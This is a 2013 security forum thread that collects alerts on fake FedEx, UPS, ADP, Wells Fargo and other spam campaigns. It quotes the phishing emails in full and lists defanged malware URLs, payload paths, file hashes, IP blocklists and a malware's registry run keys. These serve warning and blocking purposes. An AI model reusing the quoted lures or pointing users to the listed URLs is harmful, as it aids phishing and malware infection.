Fake Fedex SPAM / oxfordxtg .net
- http://blog.dynamoo.com/2013/06/fedex-spam-oxfordxtgnet.html
12 June 2013 - "This fake FedEx spam leads to malware on oxfordxtg .net:
Date: Thu, 13 Jun 2013 01:18:09 +0800 [13:18:09 EDT]
From: FedEx [wringsn052 @emc.fedex .com]
Subject: Your Fedex invoice is ready to be paid now.
FedEx(R) FedEx Billing Online - Ready for Payment
fedex.com
Hello [redacted]
You have a new outstanding invoice(s) from FedEx that is ready for payment.
The following ivoice(s) are to be paid now :
Invoice Number
5135-13792
To pay or review these invoices, please sign in to your FedEx Billing Online account by clicking on this link: http ://www.fedex .com/us/account/fbo
Note: Please do not use this email to submit payment. This email may not be used as a remittance notice. To pay your invoices, please visit FedEx Billing Online, http ://www.fedex .com/us/account/fbo
Thank you,
Revenue Services
FedEx...
Screenshot: https://lh3.ggpht.com/-gOwdBh9V5Os/Ubj285rgYBI/AAAAAAAABRs/ugqVeCeHUVo/s1600/fedex.png
The link in the email goes through a legitimate hacked site and ends up on a malware payload page at [donotclick]oxfordxtg .net/news/absence_modern-doe_byte.php (report here*) hosted on:
124.42.68.12 (Langfang University, China)
190.93.23.10 (Greendot, Trinidad and Tobago)
The following partial blocklist covers these two IPs, but I recommend you also apply this larger blocklist of related sites** as well.
124.42.68.12
190.93.23.10 ..."
* http://urlquery.net/report.php?id=3082461
** http://blog.dynamoo.com/2013/06/malware-sites-to-block-12613.html
___
Fake "'Anonymous' sent you a payment" emails...
- http://security.intuit.com/alert.php?a=83
6/12/13 - " People are receiving fake emails with the title "X sent you a payment (where X is a person's name)." Below is a copy of the email people are receiving:
Screenshot: http://security.intuit.com/images/paymentnetwork.jpg
This is the end of the fake email.
Steps to Take Now
Do -not- open the attachment in the email...
Delete the email..."
:fear::fear::mad:
AplusWebMaster
2013-06-14, 00:58
FYI...
Fake eFax Corporate SPAM...
- http://threattrack.tumblr.com/post/52887323784/efax-corporate-spam
June 13, 2013 - "Subjects Seen:
Corporate eFax message from “unknown” - 4 page(s)
Typical e-mail details:
You have received a 4 page fax at 2013-06-10 11:52:46 EST.
* The reference number for this fax [removed] .
Please visit efaxcorporate .com/corp/twa/page/customerSupport if you have any questions regarding this message or your service. You may also e-mail our corporate support department at corporatesupport @mail .efax .com.
Thank you for using the eFax Corporate service!
Malicious URLs
50.63.46.110 /erected/index.html
74.91.143.180 /frosting/index.html
weedguardplus .net/news/pictures_hints_causes.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0b08a6a6fc5ac9482b72ca0205851a20/tumblr_inline_mocjtcxZRg1qz4rgp.png
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Scanned Document Attachment Email Messages - 2013 Jun 13
Fake Secure Message Notification Email Messages - 2013 Jun 13
Malicious Attachment Email Messages - 2013 Jun 13
Fake Product Order Quotation E-mail Messages - 2013 Jun 13
Fake Money Transfer Notification E-mail Messages - 2013 Jun 13
Fake Product Order E-mail Messages - 2013 Jun 13
Fake Bill Payment Notification Email Messages - 2013 Jun 13
Fake Bill Payment Notification Email Messages - 2013 Jun 13
Fake Bank Payment Request Notification E-mail Messages - 2013 Jun 13
(More detail and links at the cisco URL above.)
:mad::fear:
AplusWebMaster
2013-06-14, 18:24
FYI...
Fake LinkedIn SPAM...
- http://threattrack.tumblr.com/post/52945930175/linkedin-invitation-spam
June 14, 2013 - "Subjects Seen:
Invitation to connect on LinkedIn
Typical e-mail details:
Hattie Fitzgerald, wants to connect with you on LinkedIn.
Malicious URLs
50.63.46.110 /jotted/index.html
audio-mastering-music .com/news/pictures_hints_causes.php?jnlp=bd187af1d0
audio-mastering-music .com/news/pictures_hints_causes.php?rwiezly=qzxqjh&rzvaax=abldjf
audio-mastering-music .com/news/pictures_hints_causes.php?pf=2w:1l:1n:1f:1j&ze=2w:31:1g:1n:1m:2v:33:1g:31:1f&x=1f&xu=s&ma=o&jopa=1715713
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c5ac6e133dd1f10b6a885b3bc82c26b5/tumblr_inline_modyjkiIOr1qz4rgp.png
___
Fake UPS Package Pickup Spam
- http://threattrack.tumblr.com/post/52951986728/ups-package-pickup-spam
June 14, 2013 - "Subjects Seen:
UPS - Your package is available for pickup ( Parcel [removed] )
Typical e-mail details:
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.
Malicious URLs
bestseoamerica .com/ponyb/gate.php
austinremoterecording .com/ponyb/gate.php
audiomasteringsearch .com/ponyb/gate.php
audiomasteringmeistro .com/ponyb/gate.php
sistersnstyle .co/4bnsSjBb.exe
destinationgreece .com/7tW.exe
villa-anastasia-crete .com/JWHvdgW.exe
kahrobaa .com/14VkWHU0 .exe
Malicious File Name and MD5:
UPS_Label_<random>.zip (05c33cfcf22c5736c4a162f6d7c2eeac)
UPS-Label_Parcel_<random>.exe (bc48d3e736c66f577636ed486a990eeb)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/59efc3e44c5392150b83b4b0128996b5/tumblr_inline_moe43yZKRF1qz4rgp.png
:mad: :fear:
AplusWebMaster
2013-06-17, 15:33
FYI...
Something evil on 85.214.64.153
- http://blog.dynamoo.com/2013/06/something-evil-on-8521464153.html
17 June 2013 - "85.214.64.153 is an IP belonging to Strato AG in Germany, it appears to host some legitimate sites but the server seems to be serving up the Neutrino exploit kit (example*) which is being injected into -hacked- websites (specifically, malicious code is being appended to legitimate .js files on those sites)... Dynamic DNS domains are being abused in this attack... These sites are mostly flagged as malicious by Google, you can see some indicators of badness here** and here***..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=3112582
** https://www.virustotal.com/en/ip-address/85.214.64.153/information/
*** http://urlquery.net/search.php?q=85.214.64.153&type=string&start=2013-06-02&end=2013-06-17&max=50
Diagnostic page for AS6724 (STRATO)
- https://www.google.com/safebrowsing/diagnostic?site=AS:6724
"... over the past 90 days, 7173 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-06-17, and the last time suspicious content was found was on 2013-06-17... we found 909 site(s) on this network... that appeared to function as intermediaries for the infection of 7496 other site(s)... We found 1434 site(s)... that infected 14549 other site(s)..."
___
Account takeover attempts nearly double ...
- https://net-security.org/secworld.php?id=15077
17 June 2013 - "ThreatMetrix* announced its Cybercrime Index, a series of Web fraud data aggregated from 1,500 customers, 9,000 websites and more than 1.7 billion cyber events. In a recent six-month snapshot ending March 31, ThreatMetrix determined that attacks on new account registrations using spoofed and synthetic identities saw the highest rate of attacks followed by account logins and payment fraud...
> http://www.threatmetrix.com/wp-content/uploads/2013/06/ThreatMetrix-Cybercrime-Index1.jpeg
Based on data taken from October 2012 through March 2013, they saw account takeover attempts nearly double (168%). These types of attacks have traditionally focused on banking and brokerage sites, but have recently escalated across e-commerce sites that store credit card details and SaaS companies that hold valuable customer data that do not yet have the heightened level of protection as banking sites..."
* http://www.threatmetrix.com/threatmetrix-network-data-finds-new-accounts-account-for-highest-rate-of-cyberattacks-with-takeover-attempts-close-to-doubling-over-6-months/
___
Rogue ads target EU users - Win32/Toolbar.SearchSuite through the KingTranslate PUA
- http://blog.webroot.com/2013/06/17/rogue-ads-target-eu-users-expose-them-to-win32toolbar-searchsuite-through-the-kingtranslate-pua/
June 17, 2013 - "... Tens of thousands of socially engineered European ads, who continue getting exposed to the rogue ads served through Yieldmanager’s network, are promoting more Potentially Unwanted Applications (PUAs) courtesy of Bandoo Media Inc and their subsidiary Koyote-Lab Inc...
Sample screenshots of the rogue KingTranslate PUA landing/download page:
1) https://webrootblog.files.wordpress.com/2013/06/kingtranslate_pua_01.png?w=659&h=496
2) https://webrootblog.files.wordpress.com/2013/06/kingtranslate_pua.png?w=592&h=550
... Rogue URL: kingtranslate .com – 109.201.151.95
Detection rate for the PUA: KingTranslateSetup-r133-n-bc.exe – MD5: 51d98879782d176ababcd8d47050f89f * ... Win32/Toolbar.SearchSuite...
We advise users to avoid using this application and to consider other free, legitimate translation services such as, for instance, Google Translate or Bing’s Translator."
* https://www.virustotal.com/en/file/3ae8a711796ba437e556881ea0f528dfbfd9d021e0d2edb8177f4bb788427d00/analysis/
File name: KingTranslateSetup-r120-n-bu.exe
Detection ratio: 3/46
Analysis date: 2013-06-16
___
Dun & Bradstreet Complaint Spam
- http://threattrack.tumblr.com/post/53202346878/dun-bradstreet-complaint-spam
June 17, 2013 - "Subjects Seen:
FW : Complaint - [removed]
Typical e-mail details:
Dun & Bradstreet has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position.
In the interest of time and good customer relations, please provide the DnB with written verification of your position in this matter by June 28, 2013. Your prompt response will allow DnB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter.
The Dun & Bradstreet develops and maintains Reliability Reports on companies across the United States and Canada . This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company.
We encourage you to print this complaint (attached file), answer the questions and respond to us.
We look forward to your prompt attention to this matter.
Malicious URLs
iguttersupply .com/ponyb/gate.php
micromeshleafguard .com/ponyb/gate.php
ornamentalgutters .com/ponyb/gate.php
radiantcarbonheat .com/ponyb/gate.php
sistersnstyle .co/4bnsSjBb.exe
destinationgreece .com/7tW.exe
backup.hellaswebnews .com/8P6j4.exe
elenaseller .net/jKK1NMDt.exe
Malicious File Name and MD5:
Case_<random>.zip (3001dc82f5cb98b60326e7f8490488cf)
Case_<random>.exe (9c862af9a540563488cdc1c61b9ef5f8)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/94b783ce0fb83b72db7fbfbdea651b41/tumblr_inline_mojpev7osN1qz4rgp.png
___
Fake NewEgg .com SPAM / profurnituree .com
- http://blog.dynamoo.com/2013/06/neweggcom-spam-profurnitureecom.html
17 June 2013 - "This fake NewEgg .com spam leads to malware on profurnituree .com:
Date: Mon, 17 Jun 2013 20:09:35 +0300 [13:09:35 EDT]
From: Newegg Auto-Notification [indeedskahu02 @services.neweg .com]
Subject: Newegg.com - Payment Charged ...
Screenshot: https://lh3.ggpht.com/-aC2D_mxMnTE/Ub9UBlLpIAI/AAAAAAAABTw/cuteVRRx9Mo/s1600/newegg3.png
The link goes through a legitimate -hacked- site and ends up on a malware landing page at [donotclick]profurnituree .com/news/posts_applied_deem.php (report here*) although the payload appears to be 404ing (I wouldn't trust that though). The domain is hosted on the following IPs:
124.232.165.112 (China Telecom, China)
186.215.126.52 (Global Village Telecom, Brazil)
190.93.23.10 (Greendot, Trinidad and Tobago)
202.147.169.211 (LINKdotNET Telecom Limited, Pakistan)
The domain registration details are fake... Below is a partial blocklist which I recommend you use in conjunction with this list.
124.232.165.112
186.215.126.52
190.93.23.10
202.147.169.211 ..."
* http://urlquery.net/report.php?id=3180371
:mad: :fear:
AplusWebMaster
2013-06-18, 17:42
FYI...
Fake UPS SPAM / rmacstolp .net
- http://blog.dynamoo.com/2013/06/ups-spam-rmacstolpnet.html
18 June 2013 - "This fake UPS spam leads to malware on rmacstolp .net:
Date: Tue, 18 Jun 2013 01:21:34 -0800 [05:21:34 EDT]
From: UPSBillingCenter @upsmail .net
Subject: Your UPS Invoice is Ready
UPS Billing Center
This is an automatically generated email. Please do not reply to this email address.
Dear UPS Customer,
Thank you for your business.
New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center.
Please visit the UPS Billing Center to view your paid invoice.
Questions about your charges? To get a better understanding of surcharges on your invoice, click here.
Discover more about UPS:
Visit ups .com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read Compass Online
© 2013 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
The link in the email goes through a legitimate -hacked- site but then ends up on a malicious payload at [donotclick]rmacstolp .net/news/fishs_grands.php (report here* and here**). The payload appears to be the Blackhole Exploit kit, but the site seems to be either not working or (more likely) is being resistant to analysis. If not called properly, the malware appears to serve up random payload pages.. I think they may be fake ones to evade detection. Here are some of them:
[donotclick]shop.babeta .ru/ftyxsem.php
[donotclick]kontra-antiabzocker .net/cpdedlp.php
[donotclick]www.cyprusivf .net/iabsvkc.php
[donotclick]clubempire .ru/ayrwoxt.php
[donotclick]artstroydom .com/rwlqqtq.php
[donotclick]www.masthotels .gr/ysmaols.php
rmacstolp .net is hosted on the following IPs:
186.215.126.52 (Global Village Telecom, Brazil)
190.93.23.10 (Greendot, Trinidad and Tobago)
193.254.231.51 (Universitatea Transilvania Brasov, Romania)
202.147.169.211 (LINKdotNET Telecom Limited, Pakistan)
Recommended blocklist:
186.215.126.52
190.93.23.10
193.254.231.51
202.147.169.211 ..."
* http://wepawet.iseclab.org/view.php?hash=ae660c5b01a9a3cb73ce83c906b28d8d&t=1371562967&type=js
** http://urlquery.net/report.php?id=3197446
___
Fake - Wells Fargo attachment Spam
- http://threattrack.tumblr.com/post/53282231311/wells-fargo-attachment-spam
June 18, 2013 - "Subjects Seen:
IMPORTANT Documents- WellsFargo
Typical e-mail details:
Please check attached documents.
Chuck_Vega
Wells Fargo Advisors
817-889-5857 office
817-353-6685 cell Chuck_Vega @wellsfargo.com
ATTENTION: THIS E-MAIL MAY BE AN ADVERTISEMENT OR SOLICITATION FOR PRODUCTS AND SERVICES.
To unsubscribe from marketing e-mails from:
· An individual Wells Fargo Advisors financial advisor: Reply to one of his/her e-mails and type “Unsubscribe” in the subject line.
· Wells Fargo and its affiliates: Unsubscribe at wellsfargoadvisors.com/unsubscribe.
Neither of these actions will affect delivery of important service messages regarding your accounts that we may need to send you or preferences you may have previously set for other e-mail services.
For additional information regarding our electronic communication policies, visit wellsfargoadvisors .com/disclosures/email-disclosure.html .
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103
Malicious URLs
thinkgreensupply .com/ponyb/gate.php
pacificcontractsources .com/ponyb/gate.php
tpi-ny.com/ponyb/gate .php
50shadesofshades .com/ponyb/gate.php
sistersnstyle .co/4bnsSjBb.exe
destinationgreece .com/7tW.exe
backup.hellaswebnews .com/8P6j4.exe
elenaseller .net/jKK1NMDt.exe
Malicious File Name and MD5:
WellsFargo_<random>.zip (3001dc82f5cb98b60326e7f8490488cf)
WellsFargo_<random>.exe (3c671b9f969a7ba0a9d9b532840c4ea2)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d7799f2594a198c2fa7d8933acf54951/tumblr_inline_molifnblxa1qz4rgp.png
:mad::fear:
AplusWebMaster
2013-06-19, 15:23
FYI...
Something evil on 205.234.139.169
- http://blog.dynamoo.com/2013/06/something-evil-on-205234139169.html
19 June 2013 - "205.234.139.169 (Hostforweb, US) appears to be hosting a bunch of Java exploits being served up on subdomains of hacked GoDaddy domains. The malware looks like it is being served up in some sort of injection attack. Here are some example URLs of badness:
[donotclick]blog2.stefuraassociatesinc .com:6842/ServerAdministrator/keys/pairs/applet.jnlp
[donotclick]blog2.stefuraassociatesinc .com:6842/ServerAdministrator/keys/pairs/contact.php
[donotclick]blog2.stefuraassociatesinc .com:6842/ServerAdministrator/keys/pairs/xXsdYVRQe.class
[donotclick]blog2.stefuraassociatesinc .com:6842/ServerAdministrator/keys/pairs/xXsdYVRQe/class.class
[donotclick]blog2.stefuraassociatesinc .com:6842/ServerAdministrator/keys/pairs/jfygZbFu
URLquery* and VirusTotal** are not very conclusive, but if it walks like a duck and quacks like a duck.. well, you know the rest.
The following domains appear to be hosted on the server. You should assume that they are all malicious, ones already flagged by Google ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/search.php?q=205.234.139.169&type=string&start=2013-06-04&end=2013-06-19&max=50
** https://www.virustotal.com/en/ip-address/205.234.139.169/information/
___
Fake HP Digital Device Spam
- http://threattrack.tumblr.com/post/53361730606/hp-digital-device-spam
June 19, 2013 - "Subjects Seen:
Scanned Copy
Typical e-mail details:
Please open the attached document. This document was digitally sent to you using an HP Digital Sending device.
To view this document you need to use the Adobe Acrobat Reader.
Malicious URLs
bagdup .com/ponyb/gate.php
baggagereviews .com/ponyb/gate.php
bagpreview .com/ponyb/gate.php
mpricecs .com .au/ceAZfkX6.exe
serw.myroitracking .com/nokxk.exe
omnicomer .com/qT6DM.exe
sweethomesorrento .it/kNH827.exe
Malicious File Name and MD5:
HP_Scan_<random>.zip (d17aab950060319ea41b038638375268)
HP_Scan_<random>.exe (eab3a43d077661ca1c9549df49477ddb)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/99a3f9f6abd4b28802a95985fda61d60/tumblr_inline_monbpvOdIV1qz4rgp.png
HP Spam / HP_Scan_06292013_398.zip FAIL
- http://blog.dynamoo.com/2013/06/hp-spam-hpscan06292013398zip-fail.html
June 19, 2013 - "I've been seeing these spams for a couple of days now..
Date: Wed, 19 Jun 2013 09:39:27 -0500 [10:39:27 EDT]
From: HP Digital Device [HP.Digital0 @victimdomain ]
Subject: Scanned Copy
Please open the attached document. This document was digitally sent to you using an HP Digital Sending device.
To view this document you need to use the Adobe Acrobat Reader...
The is an attachment called HP_Scan_06292013_398.zip. Obviously this is an attempt to deliver malware.. but the attachment is too small to have a payload. Initially I thought that it was some random part of somebody's security infrastructure stripping it off until I got a really clean copy.. and the ZIP file was just 8 bytes:
12 BA E8 AC 16 AC 7B AE
Another sample version looks like this, with just 6 bytes:
12 BA E8 AC 16 AC
Googling for 12BAE8AC16AC or 12BAE8AC16AC7BAE gets nothing at all (well, except it will now I've blogged about it)..."
___
65+ websites compromised to deliver malvertising
- https://net-security.org/malware_news.php?id=2519
June 19, 2013 - "At least 65 different sites serving ads that ultimately led to malware have been spotted by Zscaler researchers*. The massive malvertising campaign started with injected code into the ads served on the sites, and were delivered from several domains, all resolving to the following IP address: 89.45.14.87... The compromised sites were an assortment of random small and medium-sized sites, and among them was the official site for Government Security News..."
* http://research.zscaler.com/2013/06/openxadvertisingcom-mass-malvertising.html
June 18, 2013 - "On Monday, Government Security News (GSN), reported that their website had been compromised during a mass infection. While in the case of the GSN infection, the injected content was delivered from googlecodehosting.com, we have determined that the same content was also delivered from googlecodehosting.org and googlecodehosting.net, all of which resolve to 89.45.14.87 and are now offline. In reviewing our logs for sites with the aforementioned referrers, indicating that they too were/are compromised, we have thus far identified 65 different sites... Referers for the GSN site appeared as early as Jun 14th, suggesting that the site was likely compromised for a couple of days before they became aware of the situation and took steps to clean the site..."
:fear::mad:
AplusWebMaster
2013-06-20, 13:40
FYI...
Linkedin DNS Hijack
- https://isc.sans.edu/diary.html?storyid=16037
Last Updated: 2013-06-20 - "LinkedIn had its DNS "hijacked". There are no details right now, but often this is the result of an attacker compromising the account used to manage DNS servers... so far, no details are available so this could be just a simple misconfiguration. The issue has been resolved, but If LinkedIn is "down" for you, or if it points to a different site, then you should flush your DNS cache. It does not appear that Linkedin uses DNSSEC (which may not have helped if the registrar account was compromised). Your best bet to make sure you connect to the correct site is SSL... "owning" the domain may allow the attacker to create a new certificate rather quickly... other sites are affected as well... The fact that multiple site's NS records are affected implies that this may not be a simple compromised registrar account... According to:
- http://blog.escanav.com/2013/06/20/dns-hijack/ , the bad IP address is 204.11.56.17* ..."
Diagnostic page for AS40034 (CONFLUENCE)
* https://www.google.com/safebrowsing/diagnostic?site=AS:40034
"... over the past 90 days, 413 site(s).. served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-06-20, and the last time suspicious content was found was on 2013-06-20... we found 45 site(s) on this network... that appeared to function as intermediaries for the infection of 82 other site(s)... We found 347 site(s)... that infected 4358 other site(s)..."
- http://technet.microsoft.com/en-us/library/cc781949%28v=WS.10%29.aspx
"... Open Command Prompt. Type: ipconfig /flushdns ..."
- https://atlas.arbor.net/briefs/
Elevated Severity
June 20, 2013
An emergent issue involving what's been called "domain hijacking" has taken place involving a number of prominent web properties. Some concern has been expressed that the problem may be part of an attack campaign, despite statements to the contrary.
Analysis: Any type of traffic headed towards any web property that is pointing to an unexpected location - due to a DNS hijack, a hosts file hijack, man-in-the-middle, man-in-the-browser, phishing, pharming, or whatever other technique - carries some risk of delivering sensitive information, credentials, mail contents, or other data to an unexpected party, that may be malicious. Indicators suggest that some type of error was involved in this incident, however there are larger concerns at play that will likely emerge in a more widespread manner in the near future.
Source: http://isc.sans.edu/diary/Linkedin+DNS+Hijack/16037
___
Fake ADP SPAM / planete-meuble-pikin .com
- http://blog.dynamoo.com/2013/06/adp-spam-planete-meuble-pikincom.html
20 June 2013 - "This fake ADP spam leads to malware on planete-meuble-pikin .com:
Date: Thu, 20 Jun 2013 07:12:28 -0600
From: EasyNetDoNotReply @clients.adpmail .org
Subject: ADP EasyNet: Bank Account Change Alert
Dear Valued ADP Client,
As part of ADP's commitment to provide you with exceptional service, ADP is taking additional steps to ensure that your payroll data is secure. Therefore, we are sending you this e-mail as a security precaution to confirm that you have added or changed a bank account for the following employee(s) on your account:
** Dominic Johnson **
** Ayden Campbell **
Use this links to: Review or Decline this changes.
If you have not made and authorized this bank account change, please contact your ADP Service Team immediately.
This security precaution is another reason why so many businesses like yours choose ADP, the world's leading payroll provider for over 60 years, to handle their payroll.
Sincerely,
Your ADP Service Team
This e-mail comes from an unattended mailbox. Please do not reply.
The link in the email goes through a legitimate but -hacked- site and end up on a malware landing page at [donotclick]planete-meuble-pikin .com/news/network-watching.php (report here*) hosted on:
173.254.254.110 (Quadranet, US)
190.93.23.10 (Greendot, Trinidad and Tobago)
193.147.61.250 (Universidad Rey Juan Carlos, Spain)
193.254.231.51 (Universitatea Transilvania Brasov, Romania)
202.147.169.211 (LINKdotNET, Pakistan)
Recommended blocklist:
173.254.254.110
190.93.23.10
193.147.61.250
193.254.231.51
202.147.169.211 ..."
* http://urlquery.net/report.php?id=3236122
- http://threattrack.tumblr.com/post/53444315647/adp-easynet-spam
June 20, 2013 - "Subjects Seen:
ADP EasyNet: Bank Account Change Alert
Typical e-mail details:
Dear Valued ADP Client,
As part of ADP’s commitment to provide you with exceptional service, ADP is taking additional steps to ensure that your payroll data is secure. Therefore, we are sending you this e-mail as a security precaution to confirm that you have added or changed a bank account for the following employee(s) on your account:
[Removed]
Use this links to: Review or Revert this changes.
If you have not made and authorized this bank account change, please contact your ADP Service Team immediately.
This security precaution is another reason why so many businesses like yours choose ADP, the world’s leading payroll provider for over 60 years, to handle their payroll.
Sincerely,
Your ADP Service Team
Malicious URLs
support.mega-f .ru/easynet.html?view_id=6L9IRMQH
ssl.casalupitacafe .com/indication/occurred_sharing-blank.php
ssl.casalupitacafe .com/indication/occurred_sharing-blank.php?jnlp=4248af38de
ssl.casalupitacafe .com/indication/occurred_sharing-blank.php?otfjbgzd=mekpsr&lmbcq=snfip
ssl.casalupitacafe .com/indication/occurred_sharing-blank.php?lf=1i:1f:32:33:2v&fe=1j:1h:1j:1n:2v:33:1i:1n:31:32&j=1f&fo=a&jb=m&jopa=5634202
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/61217721bcdc3581e760462fb0175661/tumblr_inline_mop8h6Iy9H1qz4rgp.png
___
Fake QuickBooks Overdue Payment Spam
- http://threattrack.tumblr.com/post/53442271393/quickbooks-overdue-payment-spam
20 June 2013 - "Subjects Seen:
Please respond - overdue payment
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 06/25/2013 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Ginger Mccall
Malicious URLs
checkpoint-friendly-bag .com/ponyb/gate.php
checkpoint-friendly-bags .com/ponyb/gate.php
checkpoint-friendly-laptopcases .com/ponyb/gate.php
checkpoint-friendly-luggage .com/ponyb/gate.php
backup.hellaswebnews .com/8P6j4.exe
powermusicstudio .it/Ckq.exe
gpbit .com/MACnU.exe
sedi .ch/XDHMsu.exe
Malicious File Name and MD5:
<name>_Invoice.zip (eef2fd603a9412d3e5b99264d20a7155)
<name>_Invoice.exe (eb362fe45a54707d5c796e36975e88a5)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/19994123e5aa6ae0d0eaf1c64c394361/tumblr_inline_mop6ptsVz51qz4rgp.png
___
Fake WalMart Order Spam
- http://threattrack.tumblr.com/post/53398921161/walmart-com-order-spam
June 19, 2013 - "Subjects Seen:
Thanks for your Walmart.com Order [removed]
Typical e-mail details:
Thanks for ordering from Walmart.com. We’re currently processing your order.
You’ll receive another email, with tracking information, when your order ships.
If you’re paying by credit card or Bill Me Later®, your account will not be charged until your order ships.
If you see a pending charge on your account prior to your items shipping, this is an authorization hold to ensure the funds are available.
All other forms of payment are charged at the time the order is placed...
Malicious URLs
culinare .tv/wp-content/plugins/customize-admin/walmart.html
ssl.beautysupplyeast .com/indication/primary-processor_cost.php
ssl.beautysupplyeast .com/indication/primary-processor_cost.php?jnlp=4248af38de
ssl.beautysupplyeast .com/indication/primary-processor_cost.php?ef=1i:1f:32:33:2v&le=1j:1h:1j:1n:2v:33:1i:1n:31:32&j=1f&ol=r&gq=m&jopa=4794157
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/71b52756fefe4495b8a58362558efc79/tumblr_inline_moo1k2wX111qz4rgp.png
:mad:
AplusWebMaster
2013-06-21, 22:31
FYI...
Flash spoof leads to infectious audio ads
- http://blog.webroot.com/2013/06/21/adobe-flash-spoof-leads-to-infectious-audio-ads/
June 21, 2013 - "We’ve seen quite a few audio ads infecting users recently... As you can see in this first picture, this is another Adobe Flash spoof that launches its signature update window.
> https://webrootblog.files.wordpress.com/2013/06/audio-ads1.jpg?w=869
... It doesn’t matter what option you check; once you click “NEXT” you’ll get this next window.
> https://webrootblog.files.wordpress.com/2013/06/audio-ads2.jpg?w=869
So far this seems completely official and harmless. It even takes it’s time progressing the loading bar. However, once you click “Finish” everything closes down and the computer reboots. The command force quits all applications so you won’t have time to save anything or cancel the shutdown. Once the computer reboots there is no final closing message from “Adobe”, but everything seems normal for a few minutes. After about three to five minutes the computer slows down to a crawl and Audio ads start playing in the background... The audio streams are not being run by an audio application or an internet browser session, but instead a hijacked “svchost.exe” that’s using 88.25% CPU. If we take a look at its network communication we find that it’s establishing and closing over a hundred different connections at once. This is why the audio ads aren’t coherent and are basically just multiple advertisement streams all at once which makes for quite an annoying sound... Software Modem and Utility Suite are the culprit. If you read the full command they are located in appdata and point to two randomly named DLLs called “qogrpr.dll” and “ntrti.dll” This is extremely suspicious. All you need to do is delete the files in appdata and then remove the run keys from startup. The full registry key and directory location from are below.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“qogrpr”=”\”C:\\Windows\\System32\\rundll32.exe\” \”C:\\Users\\”youruserfolder”\\AppData\\Roaming\\qogrpr.dll\”,GetGlobals”
“ntrti”=”\”C:\\Windows\\System32\\rundll32.exe\” \”C:\\Users\\”youruserfolder”\\AppData\\Roaming\\ntrti.dll\”,NewMember”
... That’s it for this variant of the Audio ads. There are also other variants that use rootkits to infect the MBR..."
:mad::mad:
AplusWebMaster
2013-06-22, 16:02
FYI...
Fake LexisNexis SPAM ...
- http://blog.dynamoo.com/2013/06/lexisnexis-spam-fail.html
21 Jun 2013 - "This -fake- LexisNexis spam is meant to have a malicious attachment, but something has gone wrong. Nonetheless, the next time the spammers try it they will probably get it right.. so beware of any emails similar to this one.
Date: Fri, 21 Jun 2013 10:48:12 -0700 [13:48:12 EDT]
From: LexisNexis [einvoice.notification @lexisnexis .com]Book
Subject: Invoice Notification for June 2013 ...
Screenshot: https://lh3.ggpht.com/-O31Ed0UEqAk/UcTKD_VRYEI/AAAAAAAABXM/yl8xU_aOkyQ/s1600/lexisnexis.png
// ... Of note, the only link in the email goes to [donotclick]https ://server.nepplelaw .com/owa/redir.aspx?C=430ed6e3b59a4a69b2d5653797c3e3d6&URL=http%3a%2f%2fwww.adobe .com%2fproducts%2facrobat%2freadstep2.html which is the sort of thing that happens to a URL when it goes through Outlook Web Access, in this case it would be on the server server.nepplelaw .com ..."
* https://www.virustotal.com/en/file/8733cea3145c5cfac6ab9d42b867b0a598a42e87add553d01f77efa39d1588bc/analysis/
File name: LexisNexis_Invoice_06212013.zip
Detection ratio: 15/47
Analysis date: 2013-06-21
___
"Unusual Visa card activity" SPAM / anygus .com
- http://blog.dynamoo.com/2013/06/unusual-visa-card-activity-spam.html
21 Jun 2013 - "... this FAIL of a Visa spam leads to malware on anygus .com. Note the bits in {braces} that should have content..
From: Visa Anti-Fraud [upbringingve @visabusiness .com]
Date: 21 June 2013 17:36
Subject: Unusual Visa card activity
we {l1} detected {l2} activity in your business visa account.
please click here to view {l4}
your case id is: {symbol}{dig}
look for unexpected charges or questionable activity, and if you see anything suspicious,don't wait to act.
this added security is to prevent any additional fraudulent charges from taking place on your account.
